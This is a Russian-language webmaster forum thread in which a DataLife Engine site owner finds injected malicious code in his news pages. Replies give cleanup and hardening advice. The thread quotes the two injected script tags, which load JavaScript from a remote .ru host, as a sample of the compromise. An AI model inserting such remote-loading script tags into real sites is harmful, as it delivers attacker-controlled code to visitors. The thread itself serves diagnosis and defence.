Посторонний скрипт в DLE
Страницы: 1
Посторонний скрипт в DLE
Здравствуйте!
Вот увидел в Яндекс Вебмастере что на сайте обнаружен вредоносный код, так вот зашёл на свой сайт и действительно он там оказался.

Код
<script async="async" type="text/javascript" src="http://bhq6bimdfwwo857xdurp.ru/b93a29e4fa41e0c27d1d89fc94ec24b6.js?in">
</script><script async="async" type="text/javascript" src="http://bhq6bimdfwwo857xdurp.ru/896c62ef496dc5a210eb846c4ef4c5d8.js?in"></script>


Где можно его поискать? Вылазит он в краткой новости и в полной новости, после текста. Изменения явно в файлах движка, но вот отыскать его не удалось. Может кто посоветует... Заранее благодарен!
p.s. в файлах конфиг.пхп и бдконфиг.пхп посмотрел.
ищите по фтп или как удобно (через хостера) файлы с недавней датой изменения.
также помогает поиск строки кода, в частности http://bhq6bim
часто делают инекцию в каталоги \engine\modules или \ engine\inc 
А всё нашёл. Засрали всю БД. Кто знает если я просто всё почищу это не повториться заново?
очень может, надо искать дырку и латать
Цитата
killer1000 пишет:
А всё нашёл. Засрали всю БД. Кто знает если я просто всё почищу это не повториться заново?
Где нашел? У меня такая же гадость появилась. Ничего не нахожу ни в файлах движка, ни в базе..
сперва пароль от фтп смените... а потом разбирайтесь со скриптами
проблема явно в .js
Это шеллы, их вливают через уязвимости в ДЛЕ. Советую обратиться к автору этого топика: www.cy-pr.com/forum/f80/t55113/
Если код в статье, то это в БД. При наличии свежей версии достаточно сделать перестроение публикаций в админке и из новостей код удалится. так же надо проверить файлы, в которых может быть вредоносный код:
index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php
Обязательно сменить все пароли (к БД, фтп, админка) и установить патчи безопасность в зависимости от версии скрипта, с оффсайта. Если стоит нулл, менять на "чистую" версию скрипта.
Цитата
ориться зан
>p.s. в файлах конфиг.пхп и бдконфиг.пхп посмотрел.Причем тут эти файлы? Если получили доступ к бд значит дырка на хостинге, а туда могли попасть через взлом фтп. 
Закрыть дырки надо, на оф. сайте заплатки лежат, была такая же херня, доступ был получен из кеша базы, что-то в этом роде.
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
05:15 Как продвигать сайт с неуникальным контентом 
15:08 Стоит ли добавлять сайт в Rambler топ 100? 
12:59 Absence в Армении 
19:29 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
14:50 Индексация страниц 
12:36 У кого новостник, дайте пару советов плиз 
13:53 AviTool - мощный инструмент для автоматизации работы с Avito 
05:17 Продам копию сайта. 
04:11 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
01:31 Скрипт обменника валют 
21:44 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 
17:24 A-Parser 1.1 - продвинутый парсер поисковых систем, Suggest, PR, DMOZ, Whois, etc 
14:01 Продам аккаунты Gmail USA IP | Gmail MIX IP | Outlook Old 
13:15 SOCKS5 приватные прокси на 30 дней для PayPal 
05:24 Ну что, кто куда деваете свои сайты? 
22:09 Добро пожаловать в цифровой мир... 
19:42 Топ-5 способов использовать мобильные прокси для бизнеса: подробный обзор 
22:08 Накрутка поисковых подсказок 
05:04 Точные прогнозы на футбол 
14:01 Union Pharm - топовая фарма-партнерка для профессионалов! 
10:59 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди